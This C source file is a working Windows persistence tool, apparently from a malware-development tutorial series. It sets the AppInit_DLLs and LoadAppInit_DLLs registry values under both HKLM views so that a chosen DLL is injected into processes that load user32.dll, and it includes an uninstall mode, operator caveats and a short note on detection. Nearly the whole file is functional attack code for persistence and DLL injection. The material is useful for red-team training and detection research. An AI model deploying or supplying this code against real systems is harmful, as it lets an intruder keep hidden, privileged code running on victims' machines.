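/*
 * pers.cpp
 * Windows low-level persistence via AppInit_DLLs (MITRE ATT&CK T1546.010).
 * author: @cocomelonc, edited by: @gamray
 * https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html
 *
 * Usage:  pers install <path to dll>   |   pers uninstall
 *
 * "install" sets LoadAppInit_DLLs=1 and AppInit_DLLs=<full dll path>;
 * "uninstall" sets LoadAppInit_DLLs=0 and AppInit_DLLs="" under both
 *   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows          (native view)
 *   HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows (32-bit view)
 *
 * Operational caveats the code does not enforce:
 *   - Writing HKLM needs administrator rights; the key open fails with
 *     ERROR_ACCESS_DENIED otherwise and is reported below.
 *   - On Windows 8 and later the AppInit_DLLs mechanism is disabled while
 *     Secure Boot is enabled; verify on the target before relying on it.
 *   - The DLL's bitness must match the processes it is injected into; a
 *     32-bit process that opens the native key is redirected to Wow6432Node.
 *   - Defenders: writes to these two values are a high-signal detection
 *     (e.g. Sysmon registry value-set events on the key paths above).
 */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#define warn(msg, ...) printf("[!] - " msg "\n", ##__VA_ARGS__)
#define info(msg, ...) printf("[i] - " msg "\n", ##__VA_ARGS__)
#define done(msg, ...) printf("[+] - " msg "\n", ##__VA_ARGS__)

/* Registry paths (relative to HKLM) that user32.dll consults for AppInit_DLLs. */
#define APPINIT_KEY_NATIVE "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows"
#define APPINIT_KEY_WOW64  "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows"

/*
 * Return TRUE if `filename` can be stat()ed, i.e. it exists and is reachable
 * with the caller's rights. No distinction is made between file and directory.
 */
BOOL file_exists(const char *filename) {
    struct stat st;
    return stat(filename, &st) == 0;
}

/*
 * Write LoadAppInit_DLLs=act and AppInit_DLLs=dllPath under HKLM\subkey.
 *
 * subkey  - registry path relative to HKEY_LOCAL_MACHINE
 * act     - 1 to enable AppInit loading, 0 to disable
 * dllPath - NUL-terminated path list to store ("" clears the value)
 *
 * Returns TRUE when both values were written. Every failure is reported
 * through warn() and the caller decides whether it is fatal: a missing
 * Wow6432Node key on a 32-bit OS, for instance, is expected.
 */
static BOOL set_appinit(const char *subkey, DWORD act, const char *dllPath) {
    HKEY hkey = NULL;
    /* KEY_SET_VALUE is all RegSetValueEx needs; no reason to ask for more. */
    LONG res = RegOpenKeyExA(HKEY_LOCAL_MACHINE, subkey, 0, KEY_SET_VALUE, &hkey);
    if (res != ERROR_SUCCESS) {
        warn("Cannot open HKLM\\%s (error %ld)", subkey, res);
        return FALSE;
    }

    BOOL ok = TRUE;
    res = RegSetValueExA(hkey, "LoadAppInit_DLLs", 0, REG_DWORD,
                         (const BYTE *)&act, (DWORD)sizeof(act));
    if (res != ERROR_SUCCESS) {
        warn("Cannot set LoadAppInit_DLLs under HKLM\\%s (error %ld)", subkey, res);
        ok = FALSE;
    }

    /* REG_SZ data must include the terminating NUL, hence strlen + 1. */
    res = RegSetValueExA(hkey, "AppInit_DLLs", 0, REG_SZ,
                         (const BYTE *)dllPath, (DWORD)(strlen(dllPath) + 1));
    if (res != ERROR_SUCCESS) {
        warn("Cannot set AppInit_DLLs under HKLM\\%s (error %ld)", subkey, res);
        ok = FALSE;
    }

    RegCloseKey(hkey);
    if (ok) {
        done("Updated HKLM\\%s", subkey);
    }
    return ok;
}

/*
 * Entry point. Validates the command line, resolves the DLL to an absolute
 * path on install, and writes both registry views.
 *
 * Returns EXIT_SUCCESS when at least one registry view was updated,
 * EXIT_FAILURE on bad arguments, a missing/unresolvable DLL, or when no
 * key could be written (typically: not running as administrator).
 */
int main(int argc, char *argv[]) {
    if (argc < 2) {
        warn("Usage: %s install <path to dll>|uninstall", argv[0]);
        return EXIT_FAILURE;
    }

    const char *action = argv[1];
    BOOL installing = strcmp(action, "install") == 0;
    if (!installing && strcmp(action, "uninstall") != 0) {
        warn("Usage: %s install <path to dll>|uninstall", argv[0]);
        return EXIT_FAILURE;
    }
    if (installing && argc != 3) {
        warn("Usage: %s install <path to dll>", argv[0]);
        return EXIT_FAILURE;
    }

    /*
     * The buffer lives at function scope on purpose: dllPath points into it
     * and is dereferenced by the registry writes below, so it must outlive
     * the install branch.
     */
    char dllFullPath[MAX_PATH];
    const char *dllPath = "";

    if (installing) {
        const char *requested = argv[2];
        if (!file_exists(requested)) {
            warn("File %s does not exist. Exiting.", requested);
            return EXIT_FAILURE;
        }
        /*
         * GetFullPathName returns 0 on error and the *required* size when
         * the buffer is too small; both cases must be rejected, or a
         * truncated path would be persisted.
         */
        DWORD len = GetFullPathNameA(requested, MAX_PATH, dllFullPath, NULL);
        if (len == 0 || len >= MAX_PATH) {
            warn("Error while getting the full path of dll %s. Exiting.", requested);
            return EXIT_FAILURE;
        }
        dllPath = dllFullPath;
        info("Resolved dll path: %s", dllPath);
    }

    DWORD act = installing ? 1 : 0;

    /* Both views are attempted; one failing (e.g. no Wow6432Node on 32-bit) is tolerated. */
    int updated = 0;
    if (set_appinit(APPINIT_KEY_NATIVE, act, dllPath)) {
        updated++;
    }
    if (set_appinit(APPINIT_KEY_WOW64, act, dllPath)) {
        updated++;
    }

    if (updated == 0) {
        warn("No registry key could be updated (administrator rights required). Exiting.");
        return EXIT_FAILURE;
    }
    return EXIT_SUCCESS;
}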